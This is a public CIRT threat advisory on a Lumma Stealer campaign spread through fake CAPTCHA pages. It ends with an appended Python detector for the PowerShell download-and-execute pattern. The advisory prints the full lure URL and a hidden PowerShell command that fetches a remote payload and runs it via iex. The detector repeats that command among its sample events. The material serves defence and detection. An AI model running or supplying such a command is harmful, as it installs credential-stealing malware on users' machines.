Emerging threat: Stealer Malware (Lumma C2) Campaign with fake CAPTCHA pages
Published on 08-Oct-2024 13:12:00
TLP: CLEAR
Distribution: Public
Type of Threat: Stealer Malware (C2)
Date: 08 October 2024
Executive Summary
The Cyber Threat Intelligence (CTI) Unit at BGD e-GOV CIRT has recently identified a stealer malware campaign linked to the notorious Lumma Stealer malware family. Further investigation has revealed that multiple variants of stealer malware are being distributed using similar tactics. This report details how our threat intelligence researchers detected and analyzed this evolving malware campaign.
Our CTI Unit has been actively monitoring stealer malware campaigns and has identified evidence of malware that exfiltrates sensitive user information both locally and globally. In a recent analysis, we detected Lumma Stealer malware being propagated through deceptive CAPTCHA pages. This report illustrates how users are lured into infecting themselves through this novel use of fake CAPTCHA pages.
Fig: Global infection samples of Lumma C2 variants
Stealer Malware’s Footprint in Bangladesh
Fig: Recently detected victim samples with stealer malware in Bangladesh
Infection Chain
Step 1: Initial Access via Malicious Hyperlinks
Several websites in Bangladesh, popular for streaming movies, have been identified as vectors for delivering malicious content to unsuspecting users. When users interact with these websites, they are presented with a convincing CAPTCHA. Upon solving the CAPTCHA, they are instructed to open the Windows RUN prompt and paste a suspiciously long string. In our case, we found that the following URL was involved in these attacks as the primary web surfing activity:
Clicking on the above link redirects users to a CAPTCHA screen at a URL similar to the following –
https[:]//s3.ap-southeast-1.wasabisys.com/il4build/access-for-verification-page-05.html?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=MKL7RR2DGMIBE69KPENT%2F20241005%2Fap-southeast-1%2Fs3%2Faws4_request&X-Amz-Date=20241005T202512Z&X-Amz-Expires=43200&X-Amz-Signature=0a626639486a647545ce6cb94f7e0b7109cb6c34c7ecc9a1486a14b32a81eb9a&X-Amz-SignedHeaders=host&x-id=GetObject
When the user clicks “I’m not a robot” to refresh the screen, the page generates a PowerShell command in the background, silently copies it to the clipboard, and instructs the user to paste and run it from the Windows RUN prompt (the user’s command line).
Step 2: Execution of PowerShell Commands
When the user follows the instructions on the malicious page, the following PowerShell command executes on the user’s device and performs the actions described below.
powershell.exe -W Hidden -command $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Breakdown of the PowerShell Command:
1. powershell.exe -W Hidden: This runs PowerShell in hidden mode, concealing the execution from the user.
2. $url = 'https://go-for-zip.b-cdn.net/il/4/file/n4[.]txt': The URL points to a remote file (n4.txt) hosted on an external server.
3. $response = Invoke-WebRequest -Uri $url -UseBasicParsing: This command fetches the contents of the remote file using Invoke-WebRequest.
4. $text = $response.Content: The contents retrieved from the file are stored in the variable $text.
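As an added defender-side example (not part of this advisory), the following Python checks process-creation events for the download-and-execute pattern described in Step 2: a hidden PowerShell window, a web fetch of a remote .txt file, and iex of the response, with explorer.exe as the parent because the Windows RUN prompt launches commands via Explorer. Field names follow Sysmon Event ID 1; the events are constructed samples, not real telemetry.

```python
import re

# Indicators taken from the command observed in this campaign: a hidden
# window, a web fetch of a remote .txt file and iex of the response body.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "web_download": re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget)\b", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_text_payload": re.compile(r"https?://\S+\.txt\b", re.I),
}

def score_event(event: dict) -> list:
    """Return the indicator names that a Sysmon-style process-creation
    event (ParentImage, Image, CommandLine) matches."""
    if not event["Image"].lower().endswith("powershell.exe"):
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    # The Windows RUN prompt launches commands via explorer.exe, so that
    # parent is the expected shape of the clipboard-paste chain.
    if event["ParentImage"].lower().endswith("explorer.exe"):
        hits.append("run_dialog_parent")
    return hits

def find_suspicious(events: list, threshold: int = 3) -> list:
    """Return ids of events matching at least `threshold` indicators."""
    return [e["id"] for e in events if len(score_event(e)) >= threshold]

# Constructed sample events (not real telemetry). Event 2 carries the
# command from this advisory; event 3 is a common variant of the same chain.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"id": 1, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"id": 2, "ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell.exe -W Hidden -command $url = "
                    "'https://go-for-zip.b-cdn.net/il/4/file/n4.txt'; "
                    "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; "
                    "$text = $response.Content; iex $text"},
    {"id": 3, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -c \"iwr https://example.invalid/p.txt | iex\""},
    {"id": 4, "ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell.exe -Command Invoke-WebRequest -Uri "
                    "https://intranet.example/report.csv -OutFile report.csv"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["id"], score_event(e))
    print("suspicious:", find_suspicious(SAMPLE_EVENTS))  # suspicious: [2, 3]
```

Event 4 shows why a single indicator such as Invoke-WebRequest is not enough on its own: the threshold requires the combination the campaign uses.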